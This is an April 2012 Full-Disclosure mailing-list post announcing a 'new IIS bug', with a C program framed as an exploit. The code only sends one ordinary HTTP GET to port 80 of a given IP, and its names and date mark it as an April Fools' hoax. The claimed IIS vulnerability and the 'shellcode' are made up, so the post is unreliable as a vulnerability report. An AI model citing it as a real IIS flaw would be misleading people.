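Date: Sun, 1 Apr 2012 07:51:09 +0000
From: yuange <yuange1975@...mail.com>
To: full-disclosure <full-disclosure@...ts.grok.org.uk>
Subject: FW: iis bug the exp file.

/*
 iisexp41.c ver4.1
 copy by @yuange1975 2012.4.1
 "When the false is taken for true, the true becomes false as well." (假作真时真亦假。)
 http://weibo.com/yuange1975
 http://twitter.com/yuange75
 http://hi.baidu.com/yuange1975/blog/item/ac368655017819dbb745aeee.html

 Note: the only bytes this program ever sends are the plain HTTP GET request
 held in AprilFoolsDay below (see the request path and the posting date);
 build_crash_package() is commented out and no other payload exists here.
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>      /* memcpy, strlen: previously reached only through windows.h */
#include <winsock2.h>
#include <windows.h>
#include <mswsock.h>
#include <wsnwlink.h>
#include <ws2tcpip.h>
#include <process.h>     /* _beginthread, _endthread */
#include <errno.h>
#include <io.h>
#include <conio.h>
#pragma comment(lib,"ws2_32")
#pragma comment(lib,"Mswsock")

/* The request sent to the target: an ordinary HTTP/1.1 GET. */
char *AprilFoolsDay ="GET /AprilFools'Day.php HTTP/1.1\r\nHOST:weibo.com/yuange1975\r\na=b\nc:shellcode\r\n\r\n";

/*
 * Parse a dotted-quad IPv4 literal into a network-byte-order address.
 * Despite the name, no DNS lookup is performed: anything inet_addr()
 * cannot parse (INADDR_NONE) or that parses to INADDR_ANY yields 0.
 */
static unsigned int maybe_lookup_host(char* name)
{
	unsigned long ulAddr = inet_addr(name);

	if (ulAddr != INADDR_NONE && ulAddr != INADDR_ANY)
		return (unsigned int)ulAddr;
	return 0;
}

/*
 * Open a blocking TCP connection to hostname:port and send AprilFoolsDay once.
 * hostname must be a raw IPv4 literal (see maybe_lookup_host). The caller is
 * responsible for WSAStartup()/WSACleanup().
 * Returns 0 on success, -1 on any failure (the error is printed to stdout).
 */
int do_exp(char *hostname,unsigned int port)
{
	SOCKET hSocket = INVALID_SOCKET;
	struct sockaddr_in sin = {0};   /* zero sin_zero and every field we do not set */
	unsigned int addr = 0;
	int err = 0;
	int write_res = 0;
	char *crash_buf = NULL;
	int crash_buflen = 0;

	/* Resolve first: an unparsable address used to fall through as 0.0.0.0. */
	addr = maybe_lookup_host(hostname);
	if (addr == 0) {
		printf_s("invalid target address: %s\n", hostname);
		return -1;
	}

	/* create SOCKET */
	hSocket = WSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, 0, 0/*WSA_FLAG_OVERLAPPED*/);
	if (hSocket == INVALID_SOCKET) {
		printf_s("WSASocket function failed with error = %d\n", WSAGetLastError());
		return -1;
	}

	sin.sin_family = AF_INET;
	sin.sin_port = htons((u_short)port);
	memcpy(&sin.sin_addr, &addr, 4);

	/* connect */
	if (connect(hSocket, (struct sockaddr*)&sin, sizeof(struct sockaddr_in)) == SOCKET_ERROR) {
		/* Save the error before closesocket(), which may overwrite it.
		   WSAEWOULDBLOCK is only reported for non-blocking sockets; this socket
		   is blocking, so in practice any SOCKET_ERROR here is fatal. */
		err = WSAGetLastError();
		if (WSAEWOULDBLOCK != err) {
			closesocket(hSocket);
			printf_s("connect function failed with error: %d\n", err);
			return -1;
		}
	}
	printf("[*] connected to %s:%u\n", hostname, port);

	//build_crash_package(&crash_buf,&crash_buflen);
	crash_buf = AprilFoolsDay;
	crash_buflen = (int)strlen(AprilFoolsDay);

	/* send data to remote target */
	write_res = send(hSocket, crash_buf, crash_buflen, 0);
	if (write_res == SOCKET_ERROR) {
		err = WSAGetLastError();
		closesocket(hSocket);
		printf_s("send function failed with error: %d\n", err);
		return -1;
	}
	printf("[*] send %d bytes\n", write_res);

	closesocket(hSocket);
	return 0;
}

/*
 * Usage: <program> <target_ip>, where target_ip is a dotted-quad IPv4 literal.
 * Initialises Winsock, runs do_exp() against TCP port 80, then cleans up.
 * Returns 0 on success (or usage error), -1 when Winsock fails to start or
 * do_exp() reports an error.
 */
int main(int argc, const char **argv)
{
	int iResult;
	int rc;
	char *target_ip = NULL;
	WSADATA wsaData;

	/* Check argc before reading argv[1]: argv[argc] is NULL and anything past it is out of bounds. */
	if (argc < 2 || !argv[1]) {
		printf_s("usage: <target_ip>\n");
		return 0;
	}
	target_ip = (char*)argv[1];

	/* Initialize Winsock */
	iResult = WSAStartup(MAKEWORD(2, 2), &wsaData);
	if (iResult != 0) {
		printf_s("WSAStartup failed: %d\n", iResult);
		return -1;
	}

	rc = do_exp(target_ip, 80);

	/* clean - win socket */
	WSACleanup();
	return rc == 0 ? 0 : -1;
}

From: yuange1975@...mail.com
To: full-disclosure@...ts.grok.org.uk
Subject: iis bug
Date: Sun, 1 Apr 2012 03:30:29 +0000

iis new bug: http://weibo.com/yuange1975

poc:

char *AprilFoolsDay ="GET /AprilFools'Day.php HTTP/1.1\r\nHOST:http://weibo.com/yuange1975\r\na=b\nc:shellcode\r\n\r\n";

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/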